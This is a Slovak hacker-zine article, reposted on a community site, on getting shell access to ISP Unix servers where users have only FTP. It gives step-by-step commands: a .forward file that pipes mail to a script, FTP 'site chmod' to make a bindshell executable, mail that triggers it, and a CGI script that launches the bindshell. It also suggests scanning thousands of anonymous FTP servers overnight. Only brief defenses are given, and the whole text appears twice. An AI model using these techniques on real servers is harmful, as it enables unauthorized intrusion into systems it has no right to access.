 |
|
| node: | prielom 3 - surfovanie po inet provideroch |
| template: | 3 |
| parent: | prielom 003 |
| owner: | Prospero |
| viewed by: | |
| created: | 09.03.2004 - 15:40:02 |
|
cwbe coordinatez: 101 1 102 617302 618180 628620 ABSOLUT KYBERIA |
| permissions | |
| you: | r, |
| system: | public |
| net: | yes |
total descendants::0
total children::0
| Ruza | 0 |
surfovanie po inet provideroch
iste viete ze vacsina slovenskych internet providerov neposkytuje shell konta
na svojich unixovych serveroch. pokial poskytuju nejaky pristup na svoje servery,
tak je to vacsinou iba ftp, aby si uzivatel mohol napriklad updatovat svoju
www stranku. ochranu proti interaktivnemu (telnet) pripojeniu maju vacsinou slovenski
provideri ale velmi, velmi chabu. nastavenie priemerneho unix servera inet providera by
som charakterizoval takto :
- uzivatel ma pristup na server cez ftp
- telnet je zakazany tak, ze uzivatel ma ako shell nastaveny "/dev/null"
- telnet je zakazany pomocou hosts.deny alebo hosts.allow
boom, a tu vznika elementarny bezpecnostny problem. pokial ma uzivatel ftp pristup
a pokial ma vlastny home adresar, do ktoreho moze zapisovat, nie je problem ziskat
interaktivny pristup na server pomocou finty s ".forward". tato metoda je
dost stara, ale zjavne je az natolko stara, ze sa na nu zabudlo. bavil som sa nedavno v
blave na #holubnik irc session s par ludmi a oni sa ma na to pytali - a tak skrsla
idea napisat o tom do prielomu.
postup je jednoduchy - staci uploadnut .forward na server providera a do neho
vlozit prikaz na execnutie prikazu. totiz sendmail standardne povoluje execovanie
suborov. staci vyrobit si nasledovny .forward subor :
$ cat .forward
|/tmp/scriptik
$
tento subor treba uploadnut do domaceho adresara. potom si pripravime
subor "scriptik", napriklad takto :
$ cat scriptik
/tmp/bindshell &
$
bindshell je program, ktory otvori shell na vysokom porte. da sa stiahnut
z arxivu (http://hysteria.sk/arxiv). aby sa fajly mohli execnut, musia byt executable.
to sa da spravit cez prikaz "quote site chmod", takto :
$ ftp -nv
ftp> o server.provider.sk
Conected to server.provider.sk
ftp> user login heslo
ftp> cd /tmp
ftp> quote site chmod 755 bindshell
ftp> quote site chmod 755 scriptik
ftp> close
nuz a teraz staci poslat na to konto nejaky mejl, trebars prikazom "echo test | mail login@provider.sk".
sendmail spusti /tmp/scriptik a ten spusti bindshell. potom staci telnet na vysoky port,
a ziskate interaktivny pristup na server.
ako sa proti tomu branit ? jednoducho - treba obmedzit alebo znemoznit spustanie programov cez sendmail, je na to
program ktory sa vola smrsh (http://nic.zcu.cz/ftp/pub/security/cert/tools/smrsh). druha moznost je
nainstalovat iny postovy klient, napriklad smail neumoznuje defaultne execovanie akychkolvek suborov.
druhy sposob je nakonfigurovat system tak, aby uzivatel nemohol zapisovat do svojho domaceho
adresara.
specialna sranda vznikne ked je verejne zapisovatelny adresar anonymneho ftp. tym padom je mozne
spravit vyssie popisany utok bez toho aby mal clovek na masine konto, je to potom kompletne
externy utok. nastastie sa vsak uz asi tazko najde na nete server so zapisovatelnym root ftp adresarom.
je ale mozne spravit script na kontrolovanie anonymnych ftp serverov a behom jednej noci otestovat
takto tisice serverov. mozno by to viedlo k prekvapivym vysledkom.
dalsi sposob, akym moze ziskat uzivatel interaktivny pristup na providerov
server su cgi scripty. pozrite sa do srm.conf vaseho httpd daemona. vacsina
www serverov je nakonfigurovana tak, ze spustaju hocijaky subor s priponou .cgi
ako cgi script. srm.conf sa to konfiguruje riadkom :
AddHandler cgi-script .cgi
potom staci ak si medzi html fajly strcite script, ktory vam execne vyssie
spominany bindshell.. trebars taketo nieco :
#!/bin/sh
cat << EOF
Content-type: text/html
spustil sa bindshell...
EOF
/tmp/bindshell &
internet provideri na slovensku este stale trpia na horucku z amaterskeho
nadsenia, sprevadzajucu vsetky zacinajuce hi-tech odvetvia. na unix
administraciu nie su skoly, ucitelia, kurzy, ani knizky. servery drzia
v rukach samoukovia-nadsenci, ktori cerpaju rozumy z downloadnutych
HOW-TO fajlov, pokial zrovna nebehaju po klientoch a neinstaluju dial-up tcp/ip na
windows. preto nie je tazke oblafnut ich jednoduchymi trikmi a obist
tenke ochrany ich serverov. a mozno aj preto vyzera uroven sluzieb providerov
tak ako vyzera, ale to uz je tema na dalsi dlhy zimny vecer. o tom nabuduce :)
iste viete ze vacsina slovenskych internet providerov neposkytuje shell konta
na svojich unixovych serveroch. pokial poskytuju nejaky pristup na svoje servery,
tak je to vacsinou iba ftp, aby si uzivatel mohol napriklad updatovat svoju
www stranku. ochranu proti interaktivnemu (telnet) pripojeniu maju vacsinou slovenski
provideri ale velmi, velmi chabu. nastavenie priemerneho unix servera inet providera by
som charakterizoval takto :
- uzivatel ma pristup na server cez ftp
- telnet je zakazany tak, ze uzivatel ma ako shell nastaveny "/dev/null"
- telnet je zakazany pomocou hosts.deny alebo hosts.allow
boom, a tu vznika elementarny bezpecnostny problem. pokial ma uzivatel ftp pristup
a pokial ma vlastny home adresar, do ktoreho moze zapisovat, nie je problem ziskat
interaktivny pristup na server pomocou finty s ".forward". tato metoda je
dost stara, ale zjavne je az natolko stara, ze sa na nu zabudlo. bavil som sa nedavno v
blave na #holubnik irc session s par ludmi a oni sa ma na to pytali - a tak skrsla
idea napisat o tom do prielomu.
postup je jednoduchy - staci uploadnut .forward na server providera a do neho
vlozit prikaz na execnutie prikazu. totiz sendmail standardne povoluje execovanie
suborov. staci vyrobit si nasledovny .forward subor :
$ cat .forward
|/tmp/scriptik
$
tento subor treba uploadnut do domaceho adresara. potom si pripravime
subor "scriptik", napriklad takto :
$ cat scriptik
/tmp/bindshell &
$
bindshell je program, ktory otvori shell na vysokom porte. da sa stiahnut
z arxivu (http://hysteria.sk/arxiv). aby sa fajly mohli execnut, musia byt executable.
to sa da spravit cez prikaz "quote site chmod", takto :
$ ftp -nv
ftp> o server.provider.sk
Conected to server.provider.sk
ftp> user login heslo
ftp> cd /tmp
ftp> quote site chmod 755 bindshell
ftp> quote site chmod 755 scriptik
ftp> close
nuz a teraz staci poslat na to konto nejaky mejl, trebars prikazom "echo test | mail login@provider.sk".
sendmail spusti /tmp/scriptik a ten spusti bindshell. potom staci telnet na vysoky port,
a ziskate interaktivny pristup na server.
ako sa proti tomu branit ? jednoducho - treba obmedzit alebo znemoznit spustanie programov cez sendmail, je na to
program ktory sa vola smrsh (http://nic.zcu.cz/ftp/pub/security/cert/tools/smrsh). druha moznost je
nainstalovat iny postovy klient, napriklad smail neumoznuje defaultne execovanie akychkolvek suborov.
druhy sposob je nakonfigurovat system tak, aby uzivatel nemohol zapisovat do svojho domaceho
adresara.
specialna sranda vznikne ked je verejne zapisovatelny adresar anonymneho ftp. tym padom je mozne
spravit vyssie popisany utok bez toho aby mal clovek na masine konto, je to potom kompletne
externy utok. nastastie sa vsak uz asi tazko najde na nete server so zapisovatelnym root ftp adresarom.
je ale mozne spravit script na kontrolovanie anonymnych ftp serverov a behom jednej noci otestovat
takto tisice serverov. mozno by to viedlo k prekvapivym vysledkom.
dalsi sposob, akym moze ziskat uzivatel interaktivny pristup na providerov
server su cgi scripty. pozrite sa do srm.conf vaseho httpd daemona. vacsina
www serverov je nakonfigurovana tak, ze spustaju hocijaky subor s priponou .cgi
ako cgi script. srm.conf sa to konfiguruje riadkom :
AddHandler cgi-script .cgi
potom staci ak si medzi html fajly strcite script, ktory vam execne vyssie
spominany bindshell.. trebars taketo nieco :
#!/bin/sh
cat << EOF
Content-type: text/html
spustil sa bindshell...
EOF
/tmp/bindshell &
internet provideri na slovensku este stale trpia na horucku z amaterskeho
nadsenia, sprevadzajucu vsetky zacinajuce hi-tech odvetvia. na unix
administraciu nie su skoly, ucitelia, kurzy, ani knizky. servery drzia
v rukach samoukovia-nadsenci, ktori cerpaju rozumy z downloadnutych
HOW-TO fajlov, pokial zrovna nebehaju po klientoch a neinstaluju dial-up tcp/ip na
windows. preto nie je tazke oblafnut ich jednoduchymi trikmi a obist
tenke ochrany ich serverov. a mozno aj preto vyzera uroven sluzieb providerov
tak ako vyzera, ale to uz je tema na dalsi dlhy zimny vecer. o tom nabuduce :)